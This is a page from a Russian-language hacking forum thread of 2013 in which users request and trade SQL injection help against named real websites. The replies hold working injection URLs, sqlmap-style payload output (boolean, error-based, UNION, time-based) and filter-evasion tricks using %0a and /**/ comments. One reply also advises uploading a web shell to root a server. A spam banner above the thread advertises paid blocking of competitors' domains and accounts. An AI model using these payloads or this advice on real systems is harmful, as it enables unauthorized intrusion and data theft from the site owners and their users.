УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2203 из 2438

2203

Опции темы

Поиск в этой теме

Опции просмотра

#22021

27.01.2013, 14:44

romasjanXXL

Guest

Сообщений: n/a

Провел на форуме:
1402

Репутация: 0

День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_prod uct кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз

#22022

27.01.2013, 15:09

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от romasjanXXL

romasjanXXL said:
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_prod uct кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз

Издеваетесь? Проще простого...Совсем народ оборзел.

Код:

Code:
http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product

#22023

27.01.2013, 19:11

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Есть скуля с правами ROOT

Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.

Что можно сделать чтобы порутать данный серв?

#22024

27.01.2013, 19:15

Artrix

Guest

Сообщений: n/a

Провел на форуме:
5957

Репутация: 0

Цитата:

Сообщение от \/IRUS

\/IRUS said:
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?

Может для начала залить шелл? Ищи админку.

#22025

27.01.2013, 19:16

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Цитата:

Сообщение от Artrix

Artrix said:
Может для начала залить шелл? Ищи админку.

ищу просто уже вариантов нету

#22026

27.01.2013, 19:36

LelouchMe

Guest

Сообщений: n/a

Провел на форуме:
6667

Репутация: 0

Не пойму как правильно тут составить запрос... Хелп плс...

http://skyscript.ru/primer/skynews/?act=nov&news_id=1

#22027

27.01.2013, 19:47

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Цитата:

Сообщение от LelouchMe

LelouchMe said:
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1

Place: GET

Parameter: news_id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3

a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(

RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia

zZ

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x

51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc

вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23

пробелы ток убери

#22028

27.01.2013, 19:48

ukrpunk

Guest

Сообщений: n/a

Провел на форуме:
7946

Репутация: 5

Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--

#22029

27.01.2013, 19:54

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от ukrpunk

ukrpunk said:
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--

%0afrom table_name

#22030

27.01.2013, 19:58

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Цитата:

Сообщение от ukrpunk

ukrpunk said:
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--

попробуй /**/from/**/table_name--

Страница 2203 из 2438

2203

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход